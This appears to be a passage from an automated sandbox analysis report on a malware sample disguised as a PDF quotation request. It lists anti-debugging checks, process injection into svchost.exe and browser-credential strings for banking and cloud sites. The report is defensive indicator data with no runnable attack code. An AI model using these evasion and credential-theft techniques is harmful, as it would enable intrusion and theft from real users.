                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0045DE8F FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Code function: 11_2_02E1C380 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
                Source: Z9508-2L1.11.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Z9508-2L1.11.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: Z9508-2L1.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: Z9508-2L1.11.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1300099287.0000000000A3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Z9508-2L1.11.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: Z9508-2L1.11.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: Z9508-2L1.11.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Z9508-2L1.11.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: Z9508-2L1.11.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: Z9508-2L1.11.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Z9508-2L1.11.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: Z9508-2L1.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: Z9508-2L1.11.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: Z9508-2L1.11.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Z9508-2L1.11.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: xvYhLzczmazJ.exe, 0000000C.00000000.1723645888.0000000002B22000.00000004.00000001.00040000.00000000.sdmp | Binary or memory string: C:\Program Files (x86)\VMware Workstation\Fuxm8.exeFuxm8.exeC:\Program Files (x86)C:\Users\user~1\AppData\Local\Temp
                Source: Z9508-2L1.11.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: xvYhLzczmazJ.exe, 0000000C.00000002.3133251885.0000000000D50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: firefox.exe, 00000010.00000002.2001992886.000002B5A880F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exe/
                Source: RMActivate_isv.exe, 0000000B.00000002.3130488624.0000000002BB8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: uC:\Program Files (x86)\VMware Workstation\Fuxm8.exe
                Source: Z9508-2L1.11.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: Z9508-2L1.11.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: Z9508-2L1.11.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Z9508-2L1.11.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: Quotation request -30112024_pdf.exe, 00000002.00000003.1300099287.0000000000A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: Z9508-2L1.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: Z9508-2L1.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exe<
                Source: Z9508-2L1.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: firefox.exe, 00000010.00000002.2000496930.0000000028612000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: C:\Program Files (x86)\VMware Workstation\Fuxm8.exe
                Source: Z9508-2L1.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000002FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                Source: Z9508-2L1.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exe
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: Z9508-2L1.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: Z9508-2L1.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: Z9508-2L1.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: RMActivate_isv.exe, 0000000B.00000002.3131128904.0000000003084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\VMware Workstation\Fuxm8.exej
                Source: firefox.exe, 00000010.00000002.2000496930.0000000028612000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: VMware Workstation
                Source: Z9508-2L1.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeAPI call chain: ExitProcess graph end node graph_2-87629
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeAPI call chain: ExitProcess graph end node graph_2-86258
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\RMActivate_isv.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C7096E rdtsc 7_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417303 LdrLoadDll,7_2_00417303
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0045A370 BlockInput,2_2_0045A370
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,2_2_0040D590
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress,2_2_0040EBD0
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_03263508 mov eax, dword ptr fs:[00000030h]2_2_03263508
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_03263568 mov eax, dword ptr fs:[00000030h]2_2_03263568
                Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exeCode function: 2_2_03261EB8 mov eax, dword ptr fs:[00000030h]2_2_03261EB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEC3CD mov eax, dword ptr fs:[00000030h]7_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]7_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C383C0 mov eax, dword ptr fs:[00000030h]7_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB63C0 mov eax, dword ptr fs:[00000030h]7_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov eax, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov eax, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE3DB mov eax, dword ptr fs:[00000030h]7_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD43D4 mov eax, dword ptr fs:[00000030h]7_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD43D4 mov eax, dword ptr fs:[00000030h]7_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C403E9 mov eax, dword ptr fs:[00000030h]7_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]7_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]7_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]7_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C663FF mov eax, dword ptr fs:[00000030h]7_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E388 mov eax, dword ptr fs:[00000030h]7_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E388 mov eax, dword ptr fs:[00000030h]7_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E388 mov eax, dword ptr fs:[00000030h]7_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5438F mov eax, dword ptr fs:[00000030h]7_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5438F mov eax, dword ptr fs:[00000030h]7_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28397 mov eax, dword ptr fs:[00000030h]7_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28397 mov eax, dword ptr fs:[00000030h]7_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C28397 mov eax, dword ptr fs:[00000030h]7_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB2349 mov eax, dword ptr fs:[00000030h]7_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov ecx, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB035C mov eax, dword ptr fs:[00000030h]7_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CFA352 mov eax, dword ptr fs:[00000030h]7_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD8350 mov ecx, dword ptr fs:[00000030h]7_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD437C mov eax, dword ptr fs:[00000030h]7_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A30B mov eax, dword ptr fs:[00000030h]7_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A30B mov eax, dword ptr fs:[00000030h]7_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A30B mov eax, dword ptr fs:[00000030h]7_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C310 mov ecx, dword ptr fs:[00000030h]7_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C50310 mov ecx, dword ptr fs:[00000030h]7_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]7_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402E1 mov eax, dword ptr fs:[00000030h]7_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402E1 mov eax, dword ptr fs:[00000030h]7_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402E1 mov eax, dword ptr fs:[00000030h]7_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E284 mov eax, dword ptr fs:[00000030h]7_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E284 mov eax, dword ptr fs:[00000030h]7_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB0283 mov eax, dword ptr fs:[00000030h]7_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB0283 mov eax, dword ptr fs:[00000030h]7_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB0283 mov eax, dword ptr fs:[00000030h]7_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402A0 mov eax, dword ptr fs:[00000030h]7_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C402A0 mov eax, dword ptr fs:[00000030h]7_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC62A0 mov eax, dword ptr fs:[00000030h]7_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB8243 mov eax, dword ptr fs:[00000030h]7_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB8243 mov ecx, dword ptr fs:[00000030h]7_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A250 mov eax, dword ptr fs:[00000030h]7_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36259 mov eax, dword ptr fs:[00000030h]7_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEA250 mov eax, dword ptr fs:[00000030h]7_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEA250 mov eax, dword ptr fs:[00000030h]7_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34260 mov eax, dword ptr fs:[00000030h]7_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34260 mov eax, dword ptr fs:[00000030h]7_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34260 mov eax, dword ptr fs:[00000030h]7_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2826B mov eax, dword ptr fs:[00000030h]7_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE0274 mov eax, dword ptr fs:[00000030h]7_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2823B mov eax, dword ptr fs:[00000030h]7_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF61C3 mov eax, dword ptr fs:[00000030h]7_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF61C3 mov eax, dword ptr fs:[00000030h]7_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]7_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D061E5 mov eax, dword ptr fs:[00000030h]7_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C601F8 mov eax, dword ptr fs:[00000030h]7_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C70185 mov eax, dword ptr fs:[00000030h]7_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEC188 mov eax, dword ptr fs:[00000030h]7_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEC188 mov eax, dword ptr fs:[00000030h]7_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD4180 mov eax, dword ptr fs:[00000030h]7_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD4180 mov eax, dword ptr fs:[00000030h]7_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB019F mov eax, dword ptr fs:[00000030h]7_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A197 mov eax, dword ptr fs:[00000030h]7_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A197 mov eax, dword ptr fs:[00000030h]7_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A197 mov eax, dword ptr fs:[00000030h]7_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov ecx, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C156 mov eax, dword ptr fs:[00000030h]7_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC8158 mov eax, dword ptr fs:[00000030h]7_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36154 mov eax, dword ptr fs:[00000030h]7_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36154 mov eax, dword ptr fs:[00000030h]7_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
